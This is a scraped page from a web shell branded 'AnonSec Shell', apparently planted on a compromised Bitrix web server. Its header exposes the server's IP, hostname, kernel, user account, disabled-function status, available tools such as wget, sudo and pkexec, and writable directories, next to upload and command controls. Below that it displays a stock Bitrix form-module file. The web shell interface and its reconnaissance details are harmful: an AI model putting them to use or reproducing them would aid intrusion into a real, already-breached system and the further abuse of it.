AnonSec Shell
Server IP : 85.193.89.191  /  Your IP : 18.189.178.132
Web Server : Apache
System : Linux 956367-cx40159.tmweb.ru 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
User : bitrix ( 600)
PHP Version : 8.1.27
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bitrix/www/bitrix/modules/form/install/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/bitrix/www/bitrix/modules/form/install/include.php
<?
global $DB, $MESS, $APPLICATION;
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/filter_tools.php");

IncludeModuleLangFile(__FILE__);
IncludeModuleLangFile($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/form/errors.php");

$DBType = strtolower($DB->type);

CModule::AddAutoloadClasses(
	"form",
	array(
		// compability classes
		"CForm_old" 		=> "classes/general/form_cform_old.php",
		"CFormResult_old" 	=> "classes/general/form_cformresult_old.php",
		
		// main classes
		"CAllForm" 			=> "classes/general/form_callform.php",
		"CAllFormAnswer" 	=> "classes/general/form_callformanswer.php",
		"CAllFormField" 	=> "classes/general/form_callformfield.php",
		"CAllFormOutput" 	=> "classes/general/form_callformoutput.php",
		"CAllFormResult" 	=> "classes/general/form_callformresult.php",
		"CAllFormStatus" 	=> "classes/general/form_callformstatus.php",
		
		// API classes
		"CForm" 			=> "classes/".$DBType."/form_cform.php",
		"CFormAnswer" 		=> "classes/".$DBType."/form_cformanswer.php",
		"CFormField" 		=> "classes/".$DBType."/form_cformfield.php",
		"CFormOutput" 		=> "classes/".$DBType."/form_cformoutput.php",
		"CFormResult" 		=> "classes/".$DBType."/form_cformresult.php",
		"CFormStatus" 		=> "classes/".$DBType."/form_cformstatus.php",
	)
);
?>

Anon7 - 2022
AnonSec Team